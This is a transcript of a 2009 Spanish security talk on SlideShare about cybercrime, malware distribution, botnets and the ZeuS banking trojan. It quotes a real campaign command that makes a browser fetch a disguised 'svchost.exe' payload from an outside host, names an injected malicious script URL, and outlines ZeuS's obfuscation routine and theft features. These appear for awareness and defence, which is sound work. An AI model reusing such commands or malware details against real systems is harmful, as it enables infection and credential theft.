*[ CIBERCRIMEN: FRAUDE Y MALWARE ]




Autor: Mikel Gastesi Urroz
         mgastesi@s21sec.com
Fecha: 10-07-2009
Confidencialidad




  La información facilitada en este documento es propiedad de S21sec,
  quedando terminantemente proh...
Índice



                  Introducción - ¿Cibercrimen?
                  Evolución
                  Distribución
      ...
INTRODUCCIÓN - ¿CIBERCRIMEN?




                       Pág. 4
¿CIBERCRIMEN?
EVOLUCIÓN (de la mentalidad)
EVOLUCION


            1 persona
             • Ataques dirigidos
             • Recursos limitados

            Grupos p...
EVOLUCIÓN


            Cambio de objetivos

            Inicios: Ataques al servidor
             • Necesidad de pocos re...
EVOLUCIÓN


            1 servidor
             • Búsqueda de vulnerabilidades
             • Atacante trata de acceder al...
DISTRIBUCIÓN
DISTRIBUCIÓN


               El malware acude a la víctima
                • SPAM
                    • Búsqueda y robo d...
EJ. SPAM
EJ. SPAM
DISTRIBUCIÓN


               La víctima acude al malware
                • Páginas fraudulentas
                   • Fals...
EJ. FAKE AV
EJ. FAKE AV
DISTRIBUCIÓN


               Página comprometida, ¿cómo?
                • Nine ball: 40000 páginas
                  com...
SQL INJECTION MASIVO
INFECCIÓN
INFECCIÓN
INFECCIÓN

            Software vulnerable
             • Sistema Operativo
             • Navegador
             • Comple...
UNAS ESTADÍSTICAS... [secunia]
INFECCIÓN
INFECCIÓN


            Víctima “vulnerable”
             • Ejecución de ficheros adjuntos
             • Doble extensión ...
INFECCIÓN


      Microsoft DirectShow 0-day (msvidctl.dll)
       • Páginas comprometidas
       • Inyecta 8oy4t.8866.org...
INFECCIÓN
            La cadena es tan fuerte como el eslabón más débil
BOTNETS
BOTNETS
BOTNETS
BOTNETS


          Uso:
           • Proxy
           • Ataques DdoS
           • Obtención de credenciales
           • ...
BOTNETS



          No solo PCs
          Botnets ocultas tras Bullet-proof ISP
           • No responden a avisos de abu...
TROYANOS BANCARIOS - ZeuS
TROYANOS BANCARIOS


            Silenciosos
            Distribución masiva
            Botnet
            Robar credenci...
TROYANOS BANCARIOS


            Actores
             • Sinowal
                • Torpig
                • Buena ocultació...
ZEUS


       Finales 2006
        • Simple bot
        • ~3000$
       Principios 2007
        • Se hace popular
        ...
ZEUS – CAMBIOS IMPORTANTES


              Corrección de bugs
               • Mal saneamiento de parámetros
             ...
ZEUS
ZEUS




       Distribución
        • SPAM
           • Facturas
           • E-cards
           • Michael Jackson
      ...
ZEUS - CARACTERÍSTICAS


              Bot
              Actualización configuración
              Actualización del binar...
ZEUS - TODO


              Compatibility with Windows Vista
              and Windows 7
              Improved WinAPI hoo...
ZEUS
ZEUS - FICHEROS

              1.0.x.x
               • ntos.exe
               • wnspoemaudio.dll
               • wnspoe...
ZEUS
ZEUS
ZEUS



       Config file:
        • Cifrado con RC4
        • Update binary
        • Url C&C server
        • Advanced ...
ZEUS


         Ficheros de datos
          • Cifrado RC4 al servidor
          • Cifrado.

       For i = 1 to Length(Dat...
ZEUS - C&C
ZEUS - C&C



             Instalación:
              • Siguiente → Siguiente → Final
             PHP + mysql
           ...
ZEUS - C&C


             Instalación:
              • Siguiente → Siguiente → Final
             PHP + mysql
            ...
Zeus – C&C



             Opciones
             • Botnet : Bots online
             • Botnet : Comandos remotos
         ...
ZEUS
ZEUS



       KillOS
        • HKEY_CURRENT_USER
        • HKEY_LOCAL_MACHINEsoftware
        • HKEL_LOCAL_MACHINEsystem
...
ZEUS


       KillOS
        • HKEY_CURRENT_USER
        • HKEY_LOCAL_MACHINEsoftware
        • HKEL_LOCAL_MACHINEsystem
 ...
MONEY, MONEY, MONEY
LUCRO




        Crear malware y venderlo
        Crear botnet y alquilarla
        Obtención de credenciales y
        v...
LUCRO
LUCRO
LUCRO
LUCRO
LUCRO




        Transferencias
        Compra de bienes
         • Físicos
         • Virtuales
        Subastas
       ...
*[ MUCHAS GRACIAS ]




           Pág. 61
Próxima SlideShare
Cargando en…5
×

Cibercrimen Fraude Y Malware Mikel Gastesi

4.687 visualizaciones

Publicado el

Charla impartida por Mikel Gastesi, de S21Sec, en el curso de Verano de la Universidad de Salamanca 2009.

0 comentarios
2 recomendaciones
Estadísticas
Notas
  • Sé el primero en comentar

Sin descargas
Visualizaciones
Visualizaciones totales
4.687
En SlideShare
0
De insertados
0
Número de insertados
2.216
Acciones
Compartido
0
Descargas
104
Comentarios
0
Recomendaciones
2
Insertados 0
No insertados

No hay notas en la diapositiva.

Cibercrimen Fraude Y Malware Mikel Gastesi

  1. 1. *[ CIBERCRIMEN: FRAUDE Y MALWARE ] Autor: Mikel Gastesi Urroz mgastesi@s21sec.com Fecha: 10-07-2009
  2. 2. Confidencialidad La información facilitada en este documento es propiedad de S21sec, quedando terminantemente prohibida la modificación o explotación de la totalidad o parte de los contenidos del presente documento, sin el consentimiento expreso y por escrito de S21sec, sin que en ningún caso la no contestación a la correspondiente solicitud pueda ser entendida como autorización presunta para su utilización. Pág. 2
  3. 3. Índice Introducción - ¿Cibercrimen? Evolución Distribución Infección Botnets • ZeuS/Zbot Money, money, money Pág. 3
  4. 4. INTRODUCCIÓN - ¿CIBERCRIMEN? Pág. 4
  5. 5. ¿CIBERCRIMEN?
  6. 6. EVOLUCIÓN (de la mentalidad)
  7. 7. EVOLUCION 1 persona • Ataques dirigidos • Recursos limitados Grupos profesionales • Ataques indiscriminados/masivos • Muchos recursos técnicos
  8. 8. EVOLUCIÓN Cambio de objetivos Inicios: Ataques al servidor • Necesidad de pocos recursos • Mayor conciencia de seguridad Ahora: Ataque a los clientes • Necesidad de manejar mucha información • Necesidad de una infraestructura tecnológica • Poca conciencia de seguridad
  9. 9. EVOLUCIÓN 1 servidor • Búsqueda de vulnerabilidades • Atacante trata de acceder al servidor N clientes • Vulnerabilidades conocidas • Victima accede al vector de infección • ¿Phishing? → Malware!!!
  10. 10. DISTRIBUCIÓN
  11. 11. DISTRIBUCIÓN El malware acude a la víctima • SPAM • Búsqueda y robo de contactos • P2P • Ingeniería social • Descargas con “regalo”
  12. 12. EJ. SPAM
  13. 13. EJ. SPAM
  14. 14. DISTRIBUCIÓN La víctima acude al malware • Páginas fraudulentas • Falsos antivirus • Falsas páginas de vídeos • Páginas comprometidas • Páginas legítimas atacas indiscriminadamente
  15. 15. EJ. FAKE AV
  16. 16. EJ. FAKE AV
  17. 17. DISTRIBUCIÓN Página comprometida, ¿cómo? • Nine ball: 40000 páginas comprometidas • Cuentas FTP • Diccionario/Brute force • SQL injection • RFI • Exploits recientes, 0-days
  18. 18. SQL INJECTION MASIVO
  19. 19. INFECCIÓN
  20. 20. INFECCIÓN
  21. 21. INFECCIÓN Software vulnerable • Sistema Operativo • Navegador • Complementos • Flash • PDF... TODO programa que interactúe con el exterior es una POSIBLE víctima.
  22. 22. UNAS ESTADÍSTICAS... [secunia]
  23. 23. INFECCIÓN
  24. 24. INFECCIÓN Víctima “vulnerable” • Ejecución de ficheros adjuntos • Doble extensión (.doc______.exe) Confianza en la página • Codecs No siempre se está a salvo teniendo todo el software actualizado • 0-days • Ventana de tiempo de los antivirus
  25. 25. INFECCIÓN Microsoft DirectShow 0-day (msvidctl.dll) • Páginas comprometidas • Inyecta 8oy4t.8866.org/aa/go.jpg • Muchos exploits, entre ellos el 0day • 2000, 2003 y XP vulnerables • Ejecuta: C:[%programfiles%]Internet Exploreriexplore.exe "http://milllk.com/wm/svchost.exe" • Detectado por solamente por 2 AV (VirusTotal) • Por ahora, v0.1 http://www.securityfocus.com/bid/35558 http://www.csis.dk/en/news/news.asp?tekstID=799 http://www.microsoft.com/technet/security/advisory/97 2890.mspx
  26. 26. INFECCIÓN La cadena es tan fuerte como el eslabón más débil
  27. 27. BOTNETS
  28. 28. BOTNETS
  29. 29. BOTNETS
  30. 30. BOTNETS Uso: • Proxy • Ataques DdoS • Obtención de credenciales • Hosting • SPAM • Supercomputadora • ...
  31. 31. BOTNETS No solo PCs Botnets ocultas tras Bullet-proof ISP • No responden a avisos de abuso • Alojan paneles de control • Alojan vectores de infección y malware • Fraudulento
  32. 32. TROYANOS BANCARIOS - ZeuS
  33. 33. TROYANOS BANCARIOS Silenciosos Distribución masiva Botnet Robar credenciales MitB ¿Por qué no más? ¡Es gratis! • Control de la máquina • Proxy • … Programado por humanos • Parámetros • Idioma, user-agent...
  34. 34. TROYANOS BANCARIOS Actores • Sinowal • Torpig • Buena ocultación • Generación de dominios mediante algoritmo • Arrestos • BankPatch • MitB • ZeuS • Más sencillo • Ocultación user-mode • ¡El rey del mambo!
  35. 35. ZEUS Finales 2006 • Simple bot • ~3000$ Principios 2007 • Se hace popular • ~700$ Finales 2007 • Versiones personalizadas Mediados 2008 • Vulnerabilidades • Implementaciones en paralelo 2009 • Vulnerabilidades corregidas • Soporta parcialmente IPv6...
  36. 36. ZEUS – CAMBIOS IMPORTANTES Corrección de bugs • Mal saneamiento de parámetros • Escritura de ficheros • ¡Guerra! 10-12-2008 → RC4 • Local data requests to the server and the configuration file can be encrypted with RC4 key depending on your choice
  37. 37. ZEUS
  38. 38. ZEUS Distribución • SPAM • Facturas • E-cards • Michael Jackson • Kits de exploits
  39. 39. ZEUS - CARACTERÍSTICAS Bot Actualización configuración Actualización del binario /etc/hosts Socks proxy Inyección HTML Redirección HTML Capturas de pantalla Capturas de teclados virtuales Captura de credenciales Robo certificados KillOS
  40. 40. ZEUS - TODO Compatibility with Windows Vista and Windows 7 Improved WinAPI hooking Random generation of configuration files to avoid generic detection Console-based builder Version supporing 64 bit processors Full IPv6 support Detailed statistics on antivirus software and firewalls installed on the infected machines
  41. 41. ZEUS
  42. 42. ZEUS - FICHEROS 1.0.x.x • ntos.exe • wnspoemaudio.dll • wnspoemvideo.dll … … 1.2.x.x • sdra64.exe • lowseclocal.ds • lowsecaudio.ds ¿1.3.x.x? • bootwindows.exe • skype32win32post.dll • skype32win64post.dll
  43. 43. ZEUS
  44. 44. ZEUS
  45. 45. ZEUS Config file: • Cifrado con RC4 • Update binary • Url C&C server • Advanced configuration • Webfilters • WebFakes • WebInjects
  46. 46. ZEUS Ficheros de datos • Cifrado RC4 al servidor • Cifrado. For i = 1 to Length(Data) If (i % 2) == 0 Data[i] -= 7 + i * 2 Else Data[i] += 10 + i * 2
  47. 47. ZEUS - C&C
  48. 48. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  49. 49. ZEUS - C&C Instalación: • Siguiente → Siguiente → Final PHP + mysql • O ficheros Generador de ficheros de configuración y binarios. Opciones del panel de control
  50. 50. Zeus – C&C Opciones • Botnet : Bots online • Botnet : Comandos remotos • Logs : Búsqueda • Logs : Ficheros subidos • System : Perfil • System : Opciones
  51. 51. ZEUS
  52. 52. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  53. 53. ZEUS KillOS • HKEY_CURRENT_USER • HKEY_LOCAL_MACHINEsoftware • HKEL_LOCAL_MACHINEsystem • Trata de llenar de ceros toda la memoria. • BSOD
  54. 54. MONEY, MONEY, MONEY
  55. 55. LUCRO Crear malware y venderlo Crear botnet y alquilarla Obtención de credenciales y venderlas Obtención de dinero gracias a las credenciales
  56. 56. LUCRO
  57. 57. LUCRO
  58. 58. LUCRO
  59. 59. LUCRO
  60. 60. LUCRO Transferencias Compra de bienes • Físicos • Virtuales Subastas ...deja volar tu imaginación
  61. 61. *[ MUCHAS GRACIAS ] Pág. 61

×